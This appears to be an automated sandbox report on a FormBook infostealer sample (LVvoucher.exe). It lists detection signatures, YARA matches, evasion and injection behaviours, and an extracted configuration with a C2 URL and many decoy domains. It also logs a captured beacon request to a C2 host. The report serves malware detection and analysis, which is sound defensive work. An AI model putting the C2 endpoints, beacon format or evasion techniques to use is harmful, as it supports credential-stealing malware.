Windows Analysis Report
LVvoucher.exe

Overview

General Information

Sample Name:	LVvoucher.exe
Analysis ID:	562062
MD5:	4f2cf362036af705349843df3419ae5d
SHA1:	49dfd4b26e8c9f2cc76df24c55e6616f438bf422
SHA256:	77604e2646be4fb59a16e33ca5e78a73ec5045b8f1cce6f5ba16c11304b1c2ee
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sigma detected: Suspicius Add Task From User AppData Temp

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Self deletion via cmd delete

.NET source code contains potential unpacker

Sigma detected: Powershell Defender Exclusion

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Sigma detected: CMSTP Execution Process Creation

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.wwwccsuresults.com/oh75/"], "decoy": ["denizgidam.com", "6cc06.com", "charlottewaldburgzeil.com", "medijanus.com", "qingdaoyiersan.com", "datcabilgisayar.xyz", "111439d.com", "xn--1ruo40k.com", "wu6enxwcx5h3.xyz", "vnscloud.net", "brtka.xyz", "showztime.com", "promocoesdedezenbro.com", "wokpy.com", "chnowuk.online", "rockshotscafe.com", "pelrjy.com", "nato-riness.com", "feixiang-chem.com", "thcoinexchange.com", "fuelrescuereponse.com", "digitaltunic.com", "cellefill.com", "paulbau.com", "camillebeckman.xyz", "ilico-media.com", "603sa.com", "firstechfedcu.com", "koreaglp.com", "thebeardedbrocksblends.com", "musumeya-kotora.com", "tocoteacanada.com", "travelwitharden.com", "diversamenteclinica.com", "bw613.com", "qe46.com", "spectrumelectrolysis.com", "maloyenterprises.com", "inovasyon.xyz", "remijoe.com", "petsgallie.com", "metagiphydownload.online", "tigerdieect.com", "jamedomp.com", "peninsularbottling.com", "1383fx.com", "pandeymasala.online", "spoilnet.com", "itweu.com", "ankxbi.icu", "lm-safe-keepingyuchand92.xyz", "dreamdsjoceo.com", "providentview.com", "newchinafortpayne.com", "wu6bvnrlz4ra.xyz", "intrasvp.com", "ghoul-ambrose.com", "alltenexpress.com", "oniray.com", "sistemaparadrogaria.com", "zeidrei514-nifty.xyz", "excaliburteacher.com", "jennyandsteven.com", "zakcotransportationllc.com"]}

Multi AV Scanner detection for submitted file

Source: LVvoucher.exe	Virustotal: Detection: 41%			Perma Link
Source: LVvoucher.exe	ReversingLabs: Detection: 46%

Yara detected FormBook

Source: Yara match	File source: 16.0.LVvoucher.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.LVvoucher.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.LVvoucher.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.403013185.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.349590313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.421008053.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.385192046.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.547341324.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.546977078.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.420898472.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.546773415.0000000000560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.420606554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.wwwccsuresults.com/oh75/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\UcgxBJ.exe

ReversingLabs: Detection: 46%

Machine Learning detection for sample

Source: LVvoucher.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\UcgxBJ.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 16.0.LVvoucher.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.LVvoucher.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.0.LVvoucher.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.0.LVvoucher.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance

Uses 32bit PE files

Source: LVvoucher.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: LVvoucher.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmstp.pdbGCTL source: LVvoucher.exe, 00000010.00000002.423242531.0000000001C60000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\nOICoDdGmj\src\obj\Debug\CaseInsensitiveHashCodeProvid.pdb source: LVvoucher.exe, UcgxBJ.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: LVvoucher.exe, 00000010.00000002.421332683.000000000189F000.00000040.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000010.00000003.358753511.00000000015E0000.00000004.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000010.00000002.421040780.0000000001780000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000017.00000002.549866914.000000000488F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000017.00000002.549751152.0000000004770000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000017.00000003.422848054.00000000045D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: LVvoucher.exe, 00000010.00000002.421332683.000000000189F000.00000040.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000010.00000003.358753511.00000000015E0000.00000004.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000010.00000002.421040780.0000000001780000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000017.00000002.549866914.000000000488F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000017.00000002.549751152.0000000004770000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000017.00000003.422848054.00000000045D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: LVvoucher.exe, 00000010.00000002.423242531.0000000001C60000.00000040.10000000.00040000.00000000.sdmp

Software Vulnerabilities

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 4x nop then pop esi	16_2_00417319
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 4x nop then pop edi	16_2_00417CFE
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 4x nop then pop edi	16_2_00417D6B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop esi	23_2_02C97319
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	23_2_02C97CFE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 4x nop then pop edi	23_2_02C97D6B

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 162.214.116.198 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sistemaparadrogaria.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.wwwccsuresults.com/oh75/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /oh75/?FXYX=6lNHWfL8rfDPMNDP&q6eTdZlX=iOacuv//8nkeO8ddqiM7nG4ecSv6NmMEEJfIiPKVhzCjN03xI/UIDvMzPThYvy/caBBR HTTP/1.1Host: www.sistemaparadrogaria.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 10:16:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: LVvoucher.exe, UcgxBJ.exe.0.dr	String found in binary or memory: http://blog.iandreev.com
Source: LVvoucher.exe	String found in binary or memory: http://blog.iandreev.com/
Source: LVvoucher.exe, UcgxBJ.exe.0.dr	String found in binary or memory: http://blog.iandreev.com/AClick
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: LVvoucher.exe, 00000000.00000002.359511322.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: LVvoucher.exe, 00000000.00000002.362283776.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown

DNS traffic detected: queries for: www.sistemaparadrogaria.com

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Creates a DirectInput object (often for capturing keystrokes)

Source: LVvoucher.exe, 00000000.00000002.358875370.00000000013CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 16.0.LVvoucher.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.LVvoucher.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.LVvoucher.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.LVvoucher.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.403013185.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.349590313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.421008053.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.385192046.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.547341324.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.546977078.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.420898472.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.546773415.0000000000560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.420606554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.0.LVvoucher.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.0.LVvoucher.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.LVvoucher.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.0.LVvoucher.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.LVvoucher.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.LVvoucher.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.LVvoucher.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.0.LVvoucher.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.LVvoucher.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.0.LVvoucher.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.LVvoucher.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.LVvoucher.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.0.LVvoucher.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.0.LVvoucher.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.403013185.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.403013185.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.349590313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000000.349590313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.421008053.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.421008053.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.385192046.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.385192046.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.547341324.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.547341324.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.546977078.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.546977078.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.420898472.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.420898472.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.546773415.0000000000560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.546773415.0000000000560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.420606554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.420606554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: LVvoucher.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses a Windows Living Off The Land Binaries (LOL bins)

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe

Yara signature match

Source: 16.0.LVvoucher.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.0.LVvoucher.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.LVvoucher.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.0.LVvoucher.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.LVvoucher.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.LVvoucher.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.LVvoucher.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.0.LVvoucher.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.LVvoucher.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.0.LVvoucher.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.LVvoucher.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
